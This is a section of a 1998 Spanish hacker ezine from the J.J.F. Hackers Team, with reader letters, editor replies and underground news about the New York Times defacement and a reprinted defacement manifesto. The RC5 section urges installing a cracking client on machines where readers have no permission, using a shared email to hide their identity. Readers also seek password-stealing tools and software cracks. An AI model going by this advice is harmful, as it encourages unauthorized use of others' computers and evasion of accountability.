  Date:  Tue, 01 Dec 1998 21:49:13 GMT
  From:  Nicolas Riggeri <nicosr@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  Hola conde  
 
  Conde, 
  como estas? 
  espero que me des bola. 
  Te cuento que me hace 3 meses no sabia lo que era una computadora hasta 
  que me compre una, me esta gustando mucho todo esto y quisiera que me 
  ensearas algo de hackers: lo que me pueden hacer y lo que yo podria 
  hacer (no tengo malas intenciones) 
  Espero que me ensees algo. 
  Si queres nos podemos juntar en algun chat a conversar ah tambien en icq 
  mi numero es el XXXXXXXX o en el poesiacom que es el chat donde yo 
  entro como NicoDance. 
  Espero tu respuesta, suerte y gracias ... 
  ...Chau ! 
  "Nico" 

  <------>

  [ Lee el FAQ y este ezine!! ]

<>

  Date:  Mon, 30 Nov 1998 11:19:15 GMT
  From:  Sire <sire7@xxxxxxxxxxxxxx>      
  To:  conde_vampiro@usa.net  
  Subject:  HOLA  
 
  Hey como estas conde_vampiro, bueno te escribo este e-mail agradecerte 
  por la informacion publicada acerca del IRC, bueno quiero decirte que 
  a mi en lo personal me gusta todo lo que se refiere a descifrar 
  password y cosas por el estilo, claro no tengo tus experiencias pero 
  creo que eso se va adquiriendo poco a poco, bueno el tema es lo 
  siguiente siendo vos uno de los fundadores del JJFHACKERS TEAM mi 
  pregunta es como puedo llegar a formar parte de el y recibir 
  informacion via e-mail acerca de la novedades surgientes con respecto 
  al Team y proyectos. 
  Me gustaria si podes que me dieras una mano para que me instruyas un 
  poco en algunas dudas..? 

  Bueno conde_vampiro que comiences bien la semana  

  <------>

  [ Todas tus preguntas son contestadas en el FAQ de nuestro website :) ]

<>

  Date:  Wed, 25 Nov 1998 00:40:14 GMT
  From:  alguien@xxxxxxxxxxxxxx      
  To:  conde_vampiro@usa.net  
  Subject:  Un paso adelante :)  
   
  Veo que estais a punto de estrenar el nuevo dominio JJF.ORG... 
  Felicitaciones por ese paso adelante. 

  Que otras cosas nuevas teneis pensado hacer, una vez que el Dominio este 
  activado? 

  Alguien 

  <------>

  [ Thx, como habras podido comprobar, hemos puesto varias cosillas ;-) ]

<>

  Date:  Tue, 01 Dec 1998 17:49:06 GMT
  From:  <jmrc@xxxxxxxxxxxxxx>      
  Subject:  Ayuda  
 
  Lei, su articulo para asustar usuarios fastidiosos de los chats, ahora
  bien tendran algo que funcione en los chat en JAVA.?
 
  gracias de antemano

  <------>

  [ Claro, leete bien otra vez la guia, ya que viene explicado. ]

<>

  Date:  Tue, 01 Dec 1998 17:44:57 GMT
  From:  "Rodrigo Da Silva" <noni@@xxxxxxxxxxxxxx>      
  To:  "J.J.F HACKERS TEAM"  
  Subject:  Felicitaciones!!!!, su pagina es muy buena  
 
  Buenas..., mi nombre es Rodrigo, soy uruguayo, un amigo mio me paso la url
  de su pagina, y queria felicitarlos porque realmente es excelente, he
  conseguido alli cosas muy interesantes, y realmente considero que los
  hackers son unos genios me gustaria formar parte de su equipo, antes no me
  interesaba el tema del hacking, no sabia ni que era, pero despues de que un
  hijo de perra, hizo bolsa mi ordenador con back orifice, en busca de una
  venganza, me he dedicado a bajar programas hacker y cracker, tambien he
  visto en su pagina las ezing o algo asi, que son articulos con curso de
  hacker etc, pero por lo que vi en la pagina de los numeros anteriores segun
  ustedes estan los temas principales, ustedes cuando publican los numeros en
  la pagina, o los mandan por e_mail?
  Otra cosa que es en la que preciso su ayuda, es que yo antes tenia el ICQ98
  y ahora instale el ICQ99, y en el icq98 tenia un crack, el cual me permitia
  autorizar sin el permiso de los otros, me gustaria si ustedes tienen o
  saben de donde puedo sacar un crack igual pero para el icq99, tambien me
  gustaria que me den links para bajar programas para el icq, ya que yo he
  buscado, pero generalmente nunca puedo entrar porque esas paginas estan
  levantadas, otra cosa que me parece interesante, seria sacar los password
  de icq de otra persona, una vez me baje un programa para hacer eso, pero no
  se como funciona.
  Y en otra cosa que quiero que me ayuden es que en la seccion de cracks
  programs de su pagina hay varios cracks pero yo lo que quiero es crackear
  todos los programas shareware, y en su pagina vi uno "nonag" o algo asi que
  cumplia esta funcion, pero no lo puedo bajar, me preguntaba si seria mucho
  pedir que me lo enviaran por mail.
  Yo creo que daar a las demas personas esta mal, digo esto porque hay
  muchos que usan programas para formatear discos, pero en lo que si estoy de
  acuerdo es en daar a los que daan, por eso me gustaria saber si alguno de
  los integrantes tienen el icq, para contactarlos, porque se de algunas
  personas que se dedican a joder gente, como me jodieron a mi.
  En su pagina lei una frase algo asi como :"la informacion pero con etica"
  eso esta muy bien , totalmente de acuerdo, bueno espero que me contesten,
  y que me ayuden con lo que les plantie en este mail, y felicitaciones por
  lo que hacen, que es muy bueno!!!!!

  Rodrigo

  <------>

  [ Thx por los cumplidos y te recomendamos que leas nuestro FAQ. ]

<>

  Date:  Tue, 01 Dec 1998 13:17:35 GMT
  From:  "Mario Masegosa" <sidoshi@xxxxxxxxxxxxxx>      
  To:  jjf_team@usa.net  
  Subject:  Distribuidor oficial de JJF / Hackers Team  
 
  Hola, estoy creando una pgina que puede ser bastante completa sobre 
  temas de IRC, IRC-War y cosas de Hacking, Ingeniera Social y todo 
  esto... por lo que me gustaria que me dierais permiso para convertirme 
  en Distribuidor oficial de vuestro e-zine, ya que me parece uno de los 
  mas completos e interesantes, aunque hay algun que otro ariticulo, que la 
  verdad... de clarificador tiene mas bien poco, pero bueno... lo 
  importante es que en general es de los mas interesantes. 
  Ademas deciros que si quereis podeis contar conmigo para escribir 
  algunos articulos con temas relacionados con el IRC y demas... 

  Por cierto... tambien estoy tratando de procesar algunos bloques del RC5 
  y unirme a vosotros... 

  Y otra cosa... la direccion recibedetodo@hotmail.com para que se va a 
  utilizar?, me refiero a que si me envian un mensaje alli me lo haceis 
  llegar vosotros o lo leis vosotros y respondeis vosotros o como va eso? 

  Muchas gracias. 

  <------>

  [ Para lo del ezine y lo de escribir articulos lee el FAQ :) Sobre la
    cuenta recibedetodo@hotmail.com, no te tienes que preocupar la gestiona
    Mr. Elektro, se utiliza cuando has puesto el RC5 en una maquina que no
    deberias y asi no comprometes tu identidad. ]

<>

<>

                           ------------------------
                           - NOTICIAS UNDERGROUND -
                           ------------------------
  
                                                - J.J.F. / HACKERS TEAM -

<>
  JJF RC5 CRACK TEAM. 

        Para los que no sepan que es esto exactamente o estan perdidos, aqui
   explicaremos todo lo que necesitais saber. Hemos creado el JJF RC5 Crack
   Team para participar en el concurso internacional para romper el algoritmo
   RC5. Este concurso esta patrocinado por la conocida RSA Inc. la cual
   organiza este concurso para demostrar la fortaleza del RC5, para vendersela
   al Tio Sam ;-)

        Empezamos en el puesto 4080 y en el tiempo que llevamos participando
   hemos alcanzado la posicion    , para ser exactos llevamos   dias en el
   concurso. A nuestro grupo de RC5 se puede unir todo aquel que quiera, ya
   que esta formada por voluntarios, a los cuales les damos las gracias por
   unirse a nuestro equipo :)

        Para uniros es realmente facil, por lo que os explicare todos los
   pasos y os queremos ver!!!!

   1- Existen clientes para muy diversas plataformas entre las que escoger,
      bajate el cliente que mas os interese. Lo mejor es pasarse por nuestro
      website, ya que ahi tienes un link directo para bajaros el programa.
                                                                      
   2. Configura el cliente(programa) con tu e-mail.

   3. Procesa y envia (flush) al menos un bloque, pero por supuesto esperamos
      que sean muchos mas :) O sea ejecuta el programa y dejalo correr un rato
      para que rompa los bloques RC5 y despues los subes.

   4. Al dia siguiente chequea tu estatus y edita tu informacion personal en
      http://www.distributed.net/ Si todo esta ok, recibiras un mail con
      un password y te vas al url de distributed.net

   5. En tu informacion personal, en la cual para entrar tienes que meter tu
      password, afiliate al ID:7281 que es el numero del JJF RC5 Crack Team.

   6. Ahora instala el cliente en todas las maquinas que puedas. Usando
      siempre el mismo e-mail para que todos los bloques que envies sean
      asignados a JJF RC5 Crack Team.

   Nota: Si no quieres usar tu propio e-mail, puedes usar
   recibedetodo@hotmail.com de forma que si instalas el cliente en una maquina
   donde no deberias haberlo hecho, no comprometeras tu identidad.
   recibedetodo@hotmail.com es parte de JJF RC5 Crack Team.

        Como veis es realmente facil o sea que todos a romper el RC5!!!!!

<>
  HACKERS DE LA FORTUNA. 

  10/27/98

  Se necesitan Hackers!!

  Esto es de libre distribucion.

  Por favor, enviar datos a sglennan@mcneiltech.com
                                                                    
        Se busca buenos Hackers en el buen sentido de la palabra para
  trabajar para el gobierno (no para el DOD o con informacion sensible) en
  aspecto de seguridad. La edad no importa, pero tiene que ser buenos, ademas
  deberan demostrar conocimiento en todo tipo de redes, especialmente Unix.

        Nota de - J.J.F. / Hackers Team -: Esta noticia esta dirigida a los
  Hackers americanos o que esten en suelo americano, por lo que ahi que tener
  dominio del ingles. Simplemente la hemos puesto para que veais que los
  Hackers no son esos tipos que se dedican a atacar servidores y demas
  tonterias, y que incluso los gobiernos los valoran.

<>
  EL HACK DEL NEW YORK TIMES.

  November 1, 1998 3:41 PM PT

        Las personas que hackearon el web del New York Times en Septiembre,
  empaquetaron sus ordenadores un dia despues y se los dieron a otros para su
  proteccion personal, afirma la revista Forbes.

        En la edicion del Lunes, Forbes dijo que los Hackers, con los nick's
  Slut Puppy y Master Pimp, son de las 2 personas mas buscadas del
  Cyberespacio.

        Miembros de un grupo de Hackers conocido como Girlies, tambien han
  invadido otros servidores en Internet, incluyendo Rt66 Internet, un nuevo
  ISP Mexicano, del cual robaron un fichero que contenia miles de tarjetas de
  credito, afirma la revista.

        'Parece que no tiene idea de como lo hicimos o como pararnos' dice
  Slut Puppy.
                                                    
        El reportaje, basado en la exclusiva entrevista con Slut Puppy, dice
  que los hackers atacaron el Times por rabia, ellos no podian aceptar un
  video para mostrar el 13 de Sept. y estabamos enfadados, por lo que nos
  apoderamos del website y cambiamos la pagina de bienvenida por una pagina
  obscena y con desnudos. El periodico denuncio el hack al FBI y el grupo de
  delincuencia informatica del FBI en New York lo esta investigando, confirmo
  Joseph Valiquette, el portavoz del caso en el FBI.
                     
        "Ningun cargo a sido imputado y la investigacion todavia sige activa,"
  comento Valiquette.
                                                    
        Nancy Nielsen, un portavoz del periodico, prefiere mantener el
  silencio mientras en caso esta siendo investigado.
                                                 
        "Nosotros tomanos este asunto muy, muy serio y no queremos decir o
  hacer algo que obstruya el caso," comenta ella.

        Los hackers tuvieron control total del servidor y los tecnicos del
  Times intentaron recuperar el control, la pagina de los hackers estuvo
  durante unas 3 horas en el cyberespacio. Finalmente los tecnicos
  consiguieron apagar el servidor, el cual contiene las noticias del
  periodico, durante nueve horas.

        Despues del asalto, el duo empaqueto sus ordenadores y borro o
  protegio toda prueba de su crime, afirma el Forbes.

        Los hackers penetraron Rt66 en Abril y en Agosto, la segunda vez
  robando un fichero con 1.749 numeros de tarjetas de credito, ademas se
  jactan de a ver asaltado el Jet Propulsion Laboratory de la NASA, Motorola
  Inc. y la revista Penthouse, comenta el Forbes.

        'Importantes evidencias.' La cuenta no revela como los hackers lo
  hicieron, pero un portavoz del Forbes dice que los reporteros y los
  editores tienen "importantes evidencias" que no salen en la historia.
                                                             
        No se han dado detalles de las vidas personales de los hackers,
  excepto que han trabajado en la casa de 3 habitaciones de Slut Puppy
  durante seis meses de este ao, una habitacion que la revista describe como
  "tan bonita, tan limpia, no parecia el tipico estereotipo hacker."

<>
  INFORMATION WELFARE HACKEADO POR EL GRUPO SPL0IT.

  http://www.unilever.com/

  Grupo Spl0it: cellbl0ck - f0bic - jay - nostalg1c

  Si, esta pagina de seguridad a sido comprometida!

        A todos aquellos que venian a visitar la pagina original, nuestras
  disculpas, tenemos algunas cosas importantes que decir y este parece el
  unico medio para llamar vuestra atencion. Aunque puede parece una tonteria
  esto que tenemos que decir, necesitabamos un sitio importante para decirlo.

        El gobierno y los medios de comunicacion han contando muchas cosas
  sobre los hackers. Se supone que debes pensar que somos malas personas, que
  solo quieren desastibilizar la bolsa de Wallstreet y que tengais una vida
  infernal. Dejadme que os diga, nosotros en absoluto somos asi.

        Somos gente que se preocupa de la seguridad en Internet y en otras
  plataformas y redes. Sin nosotros, muchos fallos nunca serian descubiertos
  y solo serian conocidos por unos pocos elegidos, que a lo mejor harian
  mal uso de este conocimiento. (Si, los hackers maliciosos existen)

        Nosotros somos las personas que levantamos la voz para exigir nuestros
  derechos. No nos olvidemos que tambien son vuestros derechos. Estamos en
  contra de las injusticias que suceden en nuestro mundo, demostramos nuestro
  coraje contra el gobierno para dejar de ser como animales amaestrados. No
  les gusta esto, y por eso nos dan mala imagen. Escojen malos ejemplos de
  hackers (Analyzer, MoD, milw0rm, HFG) y te dicen que todos somos asi.
  PUES NO LO SOMOS#@&! Mirad atentamente. Nosotros somos hackers, pidiendo
  por vuestros derechos, manteniendo al gobierno alejado de vosotros y que no
  os tengan como zombies. Si no callais, entonces quien os protegera?

        Nosotros, los hackers, no tenemos problemas raciales. Como es
  mencionado en todos los textos de hackers, vivimos sin color de piel,
  religion o diferencias raciales. Tu [el gobierno] organizas guerras, matas
  personas, robas, nos mientes y nos haceis creer que es por nuestro bien, y
  todavia seguimos siendo los criminales. Bueno, mirad detenidamente.. Quien
  es el criminal? Los hackers, defendiendote, o el gobierno, dandote falsa
  sensacion de proteccion?

        Este sitio fue hackeado para llamarte la atencion. No tenemos
  intencion de destrozar nada, hacer que los dueos pierdan dinero o cualquier
  cosa. Solo queremos transmitir nuestro mensaje.

        Agradecimientos a:
  No|d, Rhino9, Lords of the Underground, AntiOnline, Chameleon, InterCore y
  a todas aquellas personas que han despertado nuestra conciencia.

        Sin agradecimientos a:
  MoD, milw0rm, Analyzer, HFG, Ashtray Lumberjacks. Vosotros dais mala imagen
  a los hackers.

        Para terminar, permitirme que plagie a quien nos enseo TRUTH IS A
  VIRUS Chameleon (La verdad es un virus), te queremos!

        (Texto extraido del texto de Mentor aunque a lo mejor no esta escrito
  correctamente, pero entiendes lo que queremos decir.)

<>

<>

        Bueno, pues aqui acaba este magnifico numero o eso pensamos y nos
  vemos en el siguiente numero, pero os aconsejamos que paseis a menudo por
  nuestro dominio, ya que aunque el ezine salga cada dos meses (mas o menos)
  en - J.J.F. / Hackers Team - seguimos trabajando en mas cosas que las iremos
  poniendo en el website.

        Ya sabeis para cualquier cosa que nos quieras decir, escribe a nuestro
  buzon pero no antes sin haber leido nuestro FAQ!!!!

  editor@jjf.org      

                       FELIZ AO 1999 Y FELIZ NUEVOS HACK'S
                             - J.J.F. / HACKERS TEAM -

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
